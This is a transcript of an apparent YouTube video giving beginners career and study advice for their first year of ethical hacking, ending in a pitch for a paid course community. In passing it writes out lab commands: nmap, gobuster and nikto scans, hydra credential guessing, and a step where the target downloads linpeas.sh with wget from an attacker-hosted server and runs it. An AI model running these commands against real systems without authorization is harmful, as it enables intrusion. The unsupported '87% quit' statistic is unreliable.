---
video_title: "Every Hacker's First Year (What They DON'T Tell You)"
video_id: wpLU0SDn4sY
channel_name: "CyberFlow"
channel_id: UCUvkPEm38w6pq8w5QYgtPPw
channel_category: "Education"
url: https://www.youtube.com/watch?v=wpLU0SDn4sY
video_date: 2026-02-06T15:01:02+00:00
video_description: |
  Join The Family:💻👩🏻‍💻https://cyberflow-academy.framer.website/
  Check Out The Courses We Offer: https://cyberflow-academy.framer.website/courses
  
  Educational Purposes Only.
  
  learning hacking sounds exciting… until you actually start.
  
  this video breaks down what really happens in your first year of learning cybersecurity  from broken kali installs and tutorial hell to imposter syndrome, privilege escalation nightmares, and the plateau that makes most people quit.
  
  if you’re thinking about ethical hacking, penetration testing, bug bounties, or cybersecurity as a career, this is the roadmap i wish i had when i started. no movie myths, no influencer fluff  just the honest reality of how people actually learn hacking and why 87% quit in the first year.
  
  you’ll learn:
  
  how to choose the right hacking path (web, network, reverse engineering)
  how to avoid setup mistakes that make beginners quit
  what tools like nmap, metasploit, burp suite, linpeas, and gobuster are really used for
  how to escape tutorial hell and actually build skill
  why bug bounties are endgame content (not beginner friendly)
  how to break through imposter syndrome and the mid-skill plateau
  what matters more than expensive gear or “elite” setups
  
  this video is for:
  
  beginners learning hacking
  aspiring penetration testers
  cybersecurity students
  people stuck in tutorial hell
  anyone considering oscp, bug bounty, or pentesting careers
  
  everything shown here is for educational and legal purposes only. always practice on authorized platforms and labs.
  
  recommended learning resources (legal & beginner-friendly):
  
  portswigger web security academy
  https://portswigger.net/web-security
  
  tryhackme
  https://tryhackme.com
  
  hack the box
  https://www.hackthebox.com
  
  picoctf
  https://picoctf.org
  
  owasp juice shop
  https://owasp.org/www-project-juice-shop/
  
  dvwa
  https://github.com/digininja/DVWA
  
  gtfobins
  https://gtfobins.github.io
  
  lolbas
  https://lolbas-project.github.io
  
  payloads all the things
  https://github.com/swisskyrepo/PayloadsAllTheThings
  
  Chapters:
  0:00 – Deciding to Learn Hacking  
  0:48 – Pick Your Lane (Web, Network, RE)  
  1:31 – Week 1: Setup Hell  
  2:23 – Week 3: Tutorial Hell  
  2:56 – Month 1: First Box & Impostor Syndrome  
  3:31 – Month 2: Breaking Things the Wrong Way  
  3:46 – Month 3: Privilege Escalation Reality  
  4:11 – Month 6: The Plateau  
  4:42 – Month 8: The Gear Trap  
  5:18 – Day 365: One Year Later  
  
  
  
  #hacking #ethicalhacking #bugbounty #cybersecurity #hacker #pentesting #infosec #cyberattack #hackingtools #sqlinjection #metasploit #cyberflowsacademy
  
  → Email: cyberflow10@gmail.com  
  
  
  I believe in you. You can do it. 🖤
  ======================
  .▀█▀.█▄█.█▀█.█▄.█.█▄▀　█▄█.█▀█.█─█
  ─.█.─█▀█.█▀█.█.▀█.█▀▄　─█.─█▄█.█▄█
---
You just decided to learn hacking. Congrats. You've watched Mr. Robot twice, you've got Kali Linux downloading in the background, and you're about 48 hours away from realizing that literally nothing works the way it does in the movies. You've probably already visualized yourself finding a zero-day in some Fortune 500 company, or at the very least being able to impress your friends by hacking the WiFi at Starbucks. But before you open that first Metasploit tutorial,

we need to talk about the reality of your next 12 months because 87% of people who start learning cybersecurity quit in their first year. I've already made every mistake for you. Crashed production servers, bricked my own router, got IP-banned from HackTheBox more times than I care to admit, so hopefully you can learn this without losing your mind. First thing, pick your lane because hacking isn't one thing. Web application hacking means breaking websites with SQL injection and XSS, practice it legally on PortSwigger Web Security Academy and HackTheBox, but you're about to spend three months learning JavaScript just to understand why a site is vulnerable. Network penetration testing is Nmap,

Wireshark, Metasploit, scanning networks and exploiting vulnerabilities, but your mistakes are extremely loud and you'll trigger every IDS alert if you scan the wrong range. Reverse engineering is disassembling binaries and reading assembly code, it'll make you insane at finding vulns but it takes months just to understand memory addresses. Week one hits and nothing works. Your WiFi adapter isn't recognized, your VM won't boot, apt-get update throws errors, and you spend four hours on StackOverflow where every answer from 2009 ends with never mind I figured it out with no explanation. Here's the truth, you're spending 60% of your first month troubleshooting your own setup, this is where most people quit. Don't

use Kali as your daily driver yet, run it in VirtualBox or VMware, download the pre-built VM from Offensive Security's website, it's free and saves you ten hours, and snapshot your VM before you break it because you will break it. When you fire up Metasploit and type exploit and nothing happens, it's because you forgot to set RHOST or the payload or any required option, use show options before running any exploit, I've watched people waste hours on this. Week three is tutorial hell. You've bookmarked 47 YouTube videos, tabs open for TryHackMe, HackTheBox, PentesterLab, Cybrary, Udemy, and none of them agree on where to start. One guy says learn Python first, another says master networking, someone swears you should just pop boxes on HackTheBox, and you're paralyzed. Pick one resource and finish it,

TryHackMe's Complete Beginner path or TCM Security's Practical Ethical Hacking course, I don't care which, just finish one because the best course is the one you actually complete. You'll run nmap -sV -sC -oN scan.txt target and feel like a genius but won't know what to do with the results. Port 80 is open, cool, now what? Always enumerate more than you think you need, run gobuster dir -u http colon slash slash target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

for directory brute forcing, use nikto -h http colon slash slash target for web vuln scanning, check default credentials with hydra if you find login pages. Month one ends and you've rooted your first easy box, then you watch someone pop a Hard machine in 20 minutes and realize you have no idea what you're doing. This is imposter syndrome and it hits hard because there's always someone better. Stop comparing your Chapter 1 to someone's Chapter 47, even pros Google everything, I still look up sqlmap syntax every time. Start keeping a hacking journal in Obsidian, Notion, CherryTree, or a Google Doc, write down every technique in your words with your screenshots because three months from now you won't remember how you exploited that Apache Tomcat vulnerability.

Month two is when you break something important by running random scripts from GitHub without reading them. You'll download exploit code, run chmod +x exploit.sh, execute it, and watch it crash your target or your machine or accidentally scan your entire home network. I once kernel-panicked my VM with a privilege escalation script meant for Ubuntu 16.04 when I was on Kali. Before running

any exploit, read the source code, check what it's trying to do, test it in a disposable environment, take a VM snapshot. Get flameshot for screenshots on Linux, use script command to log terminal sessions for report writing later. Month three is privilege escalation hell. Getting initial access is easy, escalating to root is where hackers are made. Learn LinPEAS for Linux and WinPEAS for Windows, on your attack box run python3 -m http.server 8000, on target wget http colon slash

slash YOUR_IP colon 8000/linpeas.sh then chmod +x linpeas.sh and execute it. Study GTFOBins for Linux binary exploitation, LOLBAS for Windows living off the land binaries, and the PayloadsAllTheThings GitHub repo that has templates for everything. Month six is the plateau where you're not beginner but definitely not intermediate.

You root Easy boxes consistently, Medium boxes are hit or miss, Hard boxes make you close the tab after the first Nmap scan. Break through by doing CTFs on PicoCTF and TryHackMe events, read writeups from people better than you after rooting boxes to discover new techniques, join TryHackMe Discord or HackTheBox forums or r slash AskNetsec, and learn Python or Bash properly to automate repetitive tasks. Build a basic recon script that creates a target directory, runs nmap -sV -sC, and gobuster in one command. Month eight is the gear trap where you think you need a three thousand dollar laptop and a WiFi Pineapple and a Flipper Zero. Stop. Your skill is the bottleneck not

your hardware. You can do 95% of hacking on a $300 used laptop running VirtualBox, people pass OSCP with 8GB of RAM. If you want an upgrade get an Alfa AWUS036ACH WiFi adapter for $40 that supports monitor mode or a Raspberry Pi 4 for portable pentesting, but that $1200 you're about to spend on a hacking laptop should go toward an OSCP voucher instead. Month ten you discover bug bounties and think you'll make $10k finding vulns in real companies. You scan a target and find nothing because all the easy bugs were found in 2015, what's left requires deep expertise and luck. Bug bounties are endgame content. Practice on DVWA,

bWAPP, OWASP Juice Shop, and WebGoat instead for XSS, SQLi, CSRF, and XXE without legal risk. Day 365 you've survived. Remember when Burp Suite was confusing? Now you intercept requests in your sleep. Remember when Nmap syntax looked like hieroglyphics? Now you're chaining scans like

it's nothing. Your first year isn't about becoming leet, it's about being consistent and resilient with something genuinely difficult. If you made it through tutorial hell, broken VMs, imposter syndrome, and the plateau, you're in the top 13% who started this journey. Look, I've been doing this for years and the biggest thing I wish I had when I started wasn't better tools or more courses, it was people who'd already walked this path and could answer the random 2am questions when I was stuck. That's why I put together everything I use, every resource, every automation script, the entire workflow that took me years to figure out, into one place. First

link in the description takes you to Cyberflow's Academy, it's my private community and there's a full video walkthrough showing you exactly what's inside, complete transparency, no surprises. You get the courses I wish existed when I started, the tools I've built to save you hundreds of hours, a Discord where me and other veterans who actually work in the field answer your questions, and honestly just a group of people who are serious about not being part of that 87% that quits. I'm not here to sell you anything, I'm here because I genuinely want to see more people make it in this field and actually earn real money from it. Check it out if you're serious about Year Two, because that's when things get interesting. Thanks for watching.